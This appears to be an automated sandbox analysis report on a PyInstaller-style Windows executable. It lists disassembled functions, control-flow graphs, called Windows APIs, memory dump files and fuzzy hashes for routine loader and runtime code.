                                                                                                                                                                                                                                          control_flow_graph 530 7ff7124f1210-7ff7124f126d call 7ff7124fbd80 533 7ff7124f126f-7ff7124f1296 call 7ff7124f2710 530->533 534 7ff7124f1297-7ff7124f12af call 7ff712504f44 530->534 539 7ff7124f12d4-7ff7124f12e4 call 7ff712504f44 534->539 540 7ff7124f12b1-7ff7124f12cf call 7ff712504f08 call 7ff7124f2910 534->540 545 7ff7124f12e6-7ff7124f1304 call 7ff712504f08 call 7ff7124f2910 539->545 546 7ff7124f1309-7ff7124f131b 539->546 551 7ff7124f1439-7ff7124f146d call 7ff7124fba60 call 7ff712504f30 * 2 540->551 545->551 550 7ff7124f1320-7ff7124f1345 call 7ff71250039c 546->550 559 7ff7124f1431 550->559 560 7ff7124f134b-7ff7124f1355 call 7ff712500110 550->560 559->551 560->559 565 7ff7124f135b-7ff7124f1367 560->565 568 7ff7124f1370-7ff7124f1385 call 7ff7124fa1c0 565->568 570 7ff7124f138a-7ff7124f1398 568->570 571 7ff7124f1416-7ff7124f142c call 7ff7124f2710 570->571 572 7ff7124f139a-7ff7124f139d 570->572 571->559 573 7ff7124f1411 572->573 574 7ff7124f139f-7ff7124f13a9 572->574 573->571 576 7ff7124f13d4-7ff7124f13d7 574->576 577 7ff7124f13ab-7ff7124f13c1 call 7ff712500adc 574->577 579 7ff7124f13d9-7ff7124f13e7 call 7ff712519e30 576->579 580 7ff7124f13ea-7ff7124f13ef 576->580 587 7ff7124f13c3-7ff7124f13cd call 7ff712500110 577->587 588 7ff7124f13cf-7ff7124f13d2 577->588 579->580 580->568 581 7ff7124f13f5-7ff7124f13f8 580->581 585 7ff7124f140c-7ff7124f140f 581->585 586 7ff7124f13fa-7ff7124f13fd 581->586 585->559 586->571 589 7ff7124f13ff-7ff7124f1407 586->589 587->580 587->588 588->571 589->550
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                          • Opcode ID: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
                                                                                                                                                                                                                                          • Instruction ID: 66b2bf1aa586a7680bc42a5a2c4e1161d98b0d99462cbac5181fddeb7c46a5b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51D322A08E4241EB21BF15A8803BAA291FFC67A4FC44131ED4D477C5EEBCE959C720
                                                                                                                                                                                                                                          Function 00007FF7124F36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF7124F3804), ref: 00007FF7124F36E1
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF7124F3804), ref: 00007FF7124F36EB
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2C9E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2D63
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2C50: MessageBoxW.USER32 ref: 00007FF7124F2D99
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                          • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                          • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                          • Instruction ID: 71ae712518d8870dd7aabf1224259b029d151d58a96f7cdde2afdbf427693f4a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47219A61B1CD4241FB20BB28E8513B6A290BFC8375FC04132DD5D865D5EEACE91CC725
                                                                                                                                                                                                                                          Function 00007FF71250BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 845 7ff71250ba5c-7ff71250ba82 846 7ff71250ba9d-7ff71250baa1 845->846 847 7ff71250ba84-7ff71250ba98 call 7ff712504ee8 call 7ff712504f08 845->847 848 7ff71250be77-7ff71250be83 call 7ff712504ee8 call 7ff712504f08 846->848 849 7ff71250baa7-7ff71250baae 846->849 861 7ff71250be8e 847->861 867 7ff71250be89 _invalid_parameter_noinfo 848->867 849->848 853 7ff71250bab4-7ff71250bae2 849->853 853->848 856 7ff71250bae8-7ff71250baef 853->856 859 7ff71250bb08-7ff71250bb0b 856->859 860 7ff71250baf1-7ff71250bb03 call 7ff712504ee8 call 7ff712504f08 856->860 864 7ff71250bb11-7ff71250bb17 859->864 865 7ff71250be73-7ff71250be75 859->865 860->867 866 7ff71250be91-7ff71250bea8 861->866 864->865 869 7ff71250bb1d-7ff71250bb20 864->869 865->866 867->861 869->860 871 7ff71250bb22-7ff71250bb47 869->871 872 7ff71250bb49-7ff71250bb4b 871->872 873 7ff71250bb7a-7ff71250bb81 871->873 875 7ff71250bb4d-7ff71250bb54 872->875 876 7ff71250bb72-7ff71250bb78 872->876 877 7ff71250bb83-7ff71250bbab call 7ff71250d5fc call 7ff71250a948 * 2 873->877 878 7ff71250bb56-7ff71250bb6d call 7ff712504ee8 call 7ff712504f08 _invalid_parameter_noinfo 873->878 875->876 875->878 880 7ff71250bbf8-7ff71250bc0f 876->880 904 7ff71250bbc8-7ff71250bbf3 call 7ff71250c284 877->904 905 7ff71250bbad-7ff71250bbc3 call 7ff712504f08 call 7ff712504ee8 877->905 896 7ff71250bd00 878->896 883 7ff71250bc8a-7ff71250bc94 call 7ff71251391c 880->883 884 7ff71250bc11-7ff71250bc19 880->884 894 7ff71250bc9a-7ff71250bcaf 883->894 895 7ff71250bd1e 883->895 884->883 888 7ff71250bc1b-7ff71250bc1d 884->888 888->883 892 7ff71250bc1f-7ff71250bc35 888->892 892->883 897 7ff71250bc37-7ff71250bc43 892->897 894->895 900 7ff71250bcb1-7ff71250bcc3 GetConsoleMode 894->900 899 7ff71250bd23-7ff71250bd43 ReadFile 895->899 901 7ff71250bd03-7ff71250bd0d call 7ff71250a948 896->901 897->883 902 7ff71250bc45-7ff71250bc47 897->902 906 7ff71250bd49-7ff71250bd51 899->906 907 7ff71250be3d-7ff71250be46 GetLastError 899->907 900->895 908 7ff71250bcc5-7ff71250bccd 900->908 901->866 902->883 910 7ff71250bc49-7ff71250bc61 902->910 904->880 905->896 906->907 912 7ff71250bd57 906->912 915 7ff71250be48-7ff71250be5e call 7ff712504f08 call 7ff712504ee8 907->915 916 7ff71250be63-7ff71250be66 907->916 908->899 914 7ff71250bccf-7ff71250bcf1 ReadConsoleW 908->914 910->883 918 7ff71250bc63-7ff71250bc6f 910->918 923 7ff71250bd5e-7ff71250bd73 912->923 925 7ff71250bd12-7ff71250bd1c 914->925 926 7ff71250bcf3 GetLastError 914->926 915->896 920 7ff71250bcf9-7ff71250bcfb call 7ff712504e7c 916->920 921 7ff71250be6c-7ff71250be6e 916->921 918->883 919 7ff71250bc71-7ff71250bc73 918->919 919->883 928 7ff71250bc75-7ff71250bc85 919->928 920->896 921->901 923->901 930 7ff71250bd75-7ff71250bd80 923->930 925->923 926->920 928->883 934 7ff71250bda7-7ff71250bdaf 930->934 935 7ff71250bd82-7ff71250bd9b call 7ff71250b674 930->935 938 7ff71250be2b-7ff71250be38 call 7ff71250b4b4 934->938 939 7ff71250bdb1-7ff71250bdc3 934->939 942 7ff71250bda0-7ff71250bda2 935->942 938->942 943 7ff71250be1e-7ff71250be26 939->943 944 7ff71250bdc5 939->944 942->901 943->901 946 7ff71250bdca-7ff71250bdd1 944->946 947 7ff71250be0d-7ff71250be18 946->947 948 7ff71250bdd3-7ff71250bdd7 946->948 947->943 949 7ff71250bdd9-7ff71250bde0 948->949 950 7ff71250bdf3 948->950 949->950 951 7ff71250bde2-7ff71250bde6 949->951 952 7ff71250bdf9-7ff71250be09 950->952 951->950 953 7ff71250bde8-7ff71250bdf1 951->953 952->946 954 7ff71250be0b 952->954 953->952 954->943
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                          • Instruction ID: dbf2165508bec93022408576bb2ce849e5e57425963a01dc0b1fc0921d9529a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CC1732291CE8692E660AF1598C02BDEB50FB81BA0FD54171DA4D07791FEBCE84DC729
                                                                                                                                                                                                                                          Function 00007FF7124F6360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                          • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                          • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                          • Instruction ID: 6b512ee778843bde89a94887bd7764f28a15c249cf3df864ed2e555e5212250d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E413D31A18E8691EB15FB28E4542E9A351FB843A4FC00132DE5D476D9EFBCE92DC760
                                                                                                                                                                                                                                          Function 00007FF712505628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                                                                                                                          • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                          • Instruction ID: 535e2e6bbd25dab220523e110017ed2f99b14c9072e0b083cbbc7d43a65f34d9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E41B822D18B8183E710AF60A994379B760FB943B8F509375E65C03AD1EFBCA5E4C714
                                                                                                                                                                                                                                          Function 00007FF89D9B2B00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocPainterPath@@V0@@malloc
                                                                                                                                                                                                                                          • String ID: J9J9
                                                                                                                                                                                                                                          • API String ID: 3358426265-2881787613
                                                                                                                                                                                                                                          • Opcode ID: 397f20297a745331685ad4fe260f2d81337722706534342931fde31b935acf1f
                                                                                                                                                                                                                                          • Instruction ID: 59d86274b2d4e5fd478ba2d258393cc9fa4735f1aa74eac6b5c99bd872053fd4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 397f20297a745331685ad4fe260f2d81337722706534342931fde31b935acf1f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD212673A08A4582EB608F16F84926973A5FB88FD0F554136EE9E43764EE2CE4518B04
                                                                                                                                                                                                                                          Function 00007FF7124FCC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                                          • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                          • Instruction ID: c6cf576af74d3300f5252855043800dd550d478268fcdb9853ee1283962652e7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1313822E48D4241FB14FB28D8922B996919F857A4FC45074DD4E4B2E7EEECAC1CC338
                                                                                                                                                                                                                                          Function 00007FF71250013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                          • Instruction ID: cc0aba2a921cc5363ef9383b8771fdc1635d23ce39f21b385dd2b35012ec05ee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60512B21B1DE4286E725BE259C807BAE691AF44BB4F984770DD6C037C5EEBCD409C724
                                                                                                                                                                                                                                          Function 00007FF71250C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                                          • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                          • Instruction ID: 2c7d5046d05022def5d94b5055df8b2c6afc113d58a5daf93a83c5cabf27c145
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF11E221708F8181DA20AF25A894069E361AB56FF0F940371EEBD0B7D8EEBCD419C744
                                                                                                                                                                                                                                          Function 00007FF71250AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00007FF71250A9D5,?,?,00000000,00007FF71250AA8A), ref: 00007FF71250ABC6
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF71250A9D5,?,?,00000000,00007FF71250AA8A), ref: 00007FF71250ABD0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                                          • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
